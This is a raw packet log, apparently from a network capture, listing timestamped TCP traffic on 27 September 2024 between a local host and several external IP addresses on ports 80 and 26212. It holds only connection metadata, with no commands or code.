                                                                          Sep 27, 2024 04:21:07.429589033 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429600000 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429620028 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429630995 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429642916 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429672003 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429722071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429733992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429745913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429757118 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429761887 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429770947 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429773092 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429794073 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429816008 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429819107 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429857969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429858923 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429872036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429884911 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429896116 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429917097 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429928064 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429964066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429979086 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429991007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430001020 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430003881 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430013895 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430016041 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430035114 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430047035 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430104017 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430115938 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430128098 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430140018 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430149078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430150986 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430165052 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430171967 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430176973 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430198908 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430222034 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430258989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430272102 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430283070 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430293083 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430301905 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430311918 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430318117 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430325985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430346012 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430370092 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430416107 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430428028 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430438995 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430448055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430458069 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430459023 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430470943 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430484056 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430515051 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430560112 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430572987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430583954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430597067 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430608034 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430632114 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430670977 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430681944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430694103 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430704117 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430716038 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430741072 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430823088 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430834055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430845022 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430855036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430865049 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430870056 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430876970 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430887938 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430891037 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430907011 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430917025 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430918932 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430937052 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430960894 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.430963993 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.430977106 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431005001 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431027889 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431052923 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431066036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431077957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431092024 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431107044 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431123972 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431159973 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431171894 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431183100 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431195021 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431202888 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431206942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431210995 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431233883 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431252956 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431318998 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431330919 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431346893 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431356907 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431360006 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431369066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431377888 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431380987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431394100 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431402922 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431413889 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431415081 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431426048 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431437016 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431446075 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431449890 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431476116 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431488991 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431597948 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431610107 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431619883 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431642056 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431654930 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431663036 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431794882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431807995 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431826115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431837082 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431835890 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431849003 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431850910 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431864023 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431864977 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431875944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431880951 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431889057 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431900024 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431901932 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431911945 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431922913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431929111 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431935072 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431940079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431950092 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.431972027 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.431993961 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432110071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432121992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432133913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432145119 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432152033 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432157040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432163000 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432172060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432182074 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432185888 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432197094 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432212114 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432234049 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432316065 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432328939 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432342052 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432353973 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432354927 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432367086 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432379007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432384014 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432391882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.432410955 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.432424068 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.439656019 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:07.445581913 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:07.445650101 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:07.454770088 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:07.460750103 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480391026 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480412006 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480422020 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480432987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480443954 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.480490923 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.480492115 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.480532885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480545044 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480556965 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480567932 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.480572939 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.480581999 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.480602980 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520123959 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520145893 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520159960 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520172119 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520174026 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520189047 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520212889 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520212889 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520231009 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520245075 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520253897 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520260096 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520272017 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520273924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520292997 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520304918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520324945 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520329952 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520344019 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520354986 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520366907 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520370960 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520379066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520385981 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520417929 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520430088 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520481110 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520490885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520510912 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520523071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520534039 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520535946 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520546913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520575047 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520575047 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520602942 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520647049 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520659924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520670891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520679951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520693064 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520704985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520706892 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520716906 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520719051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520745993 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520764112 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520781040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520792007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520802975 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520818949 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520838022 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520852089 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520881891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520894051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520904064 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520915985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.520926952 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520937920 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.520950079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521019936 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521030903 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521042109 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521054029 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521056890 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521066904 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521078110 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521080971 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521090031 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521112919 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521126986 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521130085 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521145105 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521172047 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521173954 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521186113 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.521187067 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521207094 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.521230936 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:08.107952118 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:08.140028000 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:08.144867897 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:08.271197081 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:08.271539927 CEST4971580192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:08.276354074 CEST8049715185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:08.276447058 CEST4971580192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:08.276566982 CEST4971580192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:08.276622057 CEST8049712185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:08.276678085 CEST4971280192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:08.281282902 CEST8049715185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:08.333467007 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:08.380084991 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:08.998712063 CEST8049715185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:08.998809099 CEST4971580192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:09.258934975 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.263920069 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.263999939 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.264225006 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.269066095 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.983994007 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984013081 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984025955 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984039068 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984050035 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984061003 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.984070063 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984081984 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984095097 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984107018 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984117985 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.984118938 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.984152079 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.984191895 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.988920927 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.988934040 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.988991022 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.988991022 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:09.989067078 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:09.989141941 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:10.108556032 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108582020 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108591080 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108603001 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108644962 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:10.108695984 CEST4971680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:10.108863115 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108874083 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108886003 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108896971 CEST8049716185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:10.108931065 CEST4971680192.168.2.5185.215.113.26
